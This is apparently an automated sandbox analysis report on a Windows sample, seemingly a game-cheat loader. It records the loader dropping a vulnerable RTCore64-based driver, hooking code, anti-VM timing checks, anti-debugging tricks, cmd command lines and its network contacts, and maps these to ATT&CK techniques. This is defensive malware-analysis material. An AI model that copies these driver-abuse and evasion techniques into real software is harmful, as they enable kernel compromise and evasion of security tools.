Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: lUAc7lqa56.exeStatic PE information: section name: _RDATA
Source: lUAc7lqa56.exeStatic PE information: section name: .vmp0
Source: lUAc7lqa56.exeStatic PE information: section name: .vmp1

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe; Executable created and started: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; File created: C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; File created (dropped file): C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; File created (dropped file): C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; File created (dropped file): C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; File created (dropped file): C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe
Source: C:\Windows\Vulnerability.exe; File created (dropped file): C:\Users\user\AppData\Local\Temp\nULoYBmSWb
Source: C:\Windows\Vulnerability.exe; Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nULoYBmSWb

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Memory written: PID: 2256 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Memory written: PID: 2256 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Memory written: PID: 2256 base: 7FFE2238000D value: E9 BB CB EB FF
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Memory written: PID: 2256 base: 7FFE2223CBC0 value: E9 5A 34 14 00
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\lUAc7lqa56.exe; RDTSC instruction interceptor: First address: 7FF7909B8B5C second address: 7FF7909B8B85 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; RDTSC instruction interceptor: First address: 7FF7908F5097 second address: 7FF7908F50CA instructions: 0x00000000 rdtsc 0x00000002 neg eax 0x00000004 inc ecx 0x00000005 not ch 0x00000007 inc ecx 0x00000008 pop edi 0x00000009 inc ecx 0x0000000a and ch, FFFFFFEEh 0x0000000d inc ecx 0x0000000e pop esi 0x0000000f rcl ebp, cl 0x00000011 inc ecx 0x00000012 pop ebp 0x00000013 dec eax 0x00000014 add ebx, esp 0x00000016 mov cx, di 0x00000019 pop ecx 0x0000001a inc ecx 0x0000001b pop edx 0x0000001c stc 0x0000001d inc cx 0x0000001f sar ecx, FFFFFFA2h 0x00000022 popfd 0x00000023 lahf 0x00000024 mov dl, D2h 0x00000026 pop ebp 0x00000027 inc ecx 0x00000028 pop ebx 0x00000029 cwd 0x0000002b inc ebp 0x0000002c xchg ah, al 0x0000002e cbw 0x00000030 pop esi 0x00000031 inc ecx 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; RDTSC instruction interceptor: First address: 7FF79039C244 second address: 7FF79039C26D instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; RDTSC instruction interceptor: First address: 7FF790348D7E second address: 7FF790348DA1 instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 xor dl, dl 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 pop ebp 0x00000008 mov di, 74EBh 0x0000000c popfd 0x0000000d inc ecx 0x0000000e mov dl, 73h 0x00000010 inc ecx 0x00000011 pop edi 0x00000012 dec eax 0x00000013 cmovs eax, ebp 0x00000016 inc ecx 0x00000017 pop ecx 0x00000018 inc cx 0x0000001a bswap eax 0x0000001c inc ecx 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f dec ecx 0x00000020 movzx esi, si 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; RDTSC instruction interceptor: First address: 7FF7903F0928 second address: 7FF7903F0946 instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 bsr ecx, esi 0x00000006 inc ecx 0x00000007 pop ecx 0x00000008 popfd 0x00000009 cwde 0x0000000a cbw 0x0000000c movzx ebp, dx 0x0000000f pop edi 0x00000010 dec esp 0x00000011 movzx ebx, dx 0x00000014 cwde 0x00000015 inc ecx 0x00000016 xchg eax, ebx 0x00000017 pop ecx 0x00000018 cwde 0x00000019 inc ebp 0x0000001a xchg al, dh 0x0000001c inc ecx 0x0000001d pop esp 0x0000001e rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Special instruction interceptor: First address: 7FF79089AE37 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Special instruction interceptor: First address: 7FF79089AE4F instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Dropped PE file which has not been started: C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys
Source: C:\Windows\Vulnerability.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nULoYBmSWb
Source: C:\Windows\System32\timeout.exe TID: 4856; Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,4_2_00007FF7CC423B60
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWen-GBn
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1050000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; System information queried: ModuleInformation
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Handle closed: DEADC0DE
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process queried: DebugObjectHandle
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7CC424B58
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,4_2_00007FF7CC4214C0
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC421630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7CC424B58
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC4243B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7CC4243B8
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC424D00 SetUnhandledExceptionFilter,4_2_00007FF7CC424D00

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\lUAc7lqa56.exe; NtProtectVirtualMemory: Indirect: 0x7FF79041E09E
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Windows\Vulnerability.exe; Code function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF7CC4238A8
Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Vulnerability.exe; Code function: 4_2_00007FF7CC424D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF7CC424D6C
Mitre Att&ck Matrix (one line per tactic column; a number in front of a technique is the match count the report shows beside it, techniques without a number had no match)

  • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
  • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
  • Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
  • Persistence: 2 Windows Service, 2 LSASS Driver, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items
  • Privilege Escalation: 1 Exploitation for Privilege Escalation, 2 Windows Service, 11 Process Injection, 1 Abuse Elevation Control Mechanism, 2 LSASS Driver, 1 DLL Side-Loading, Startup Items
  • Defense Evasion: 131 Masquerading, 12 Virtualization/Sandbox Evasion, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 1 Abuse Elevation Control Mechanism, 1 Obfuscated Files or Information, 1 DLL Side-Loading
  • Credential Access: 1 Credential API Hooking, 11 Input Capture, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
  • Discovery: 1 System Time Discovery, 531 Security Software Discovery, 12 Virtualization/Sandbox Evasion, 2 Process Discovery, 1 File and Directory Discovery, 223 System Information Discovery, Remote System Discovery
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
  • Collection: 1 Credential API Hooking, 11 Input Capture, 11 Archive Collected Data, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
  • Command and Control: 12 Encrypted Channel, 11 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 23 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
  • Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Behavior Graph (node text recovered from the rendered graph): ID 1541826, Sample lUAc7lqa56.exe, Startdate 25/10/2024, Architecture WINDOWS, Score 100. DNS: keyauth.win. Top-level signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 5 other signatures.

  • lUAc7lqa56.exe (started): connects to 185.101.104.122, 49730, 80 (HOSTCLEAN-SRLRO, Romania), keyauth.win 104.26.0.5, 443, 49737 (CLOUDFLARENETUS, United States) and 127.0.0.1 (unknown); drops C:\Windows\driverfo.sys (PE32+), C:\Windows\Vulnerability.exe (PE32+), C:\Users\user\AppData\...\driverfo[1].sys (PE32+), C:\Users\user\...\Vulnerability[1].exe (PE32+); signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Sample is not signed and drops a device driver; Tries to evade analysis by execution special instruction (VM detection); 4 other signatures. Starts three cmd.exe instances and 3 other processes.
  • cmd.exe (first instance): Drops executables to the windows directory (C:\Windows) and starts them; starts Vulnerability.exe. Second instance starts certutil.exe and two find.exe. Third instance starts a nested cmd.exe.
  • Vulnerability.exe: drops C:\Users\user\AppData\Local\Temp\nULoYBmSWb (PE32+); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Accesses win32k, likely to find offsets for exploits; Machine Learning detection for dropped file. Starts conhost.exe.
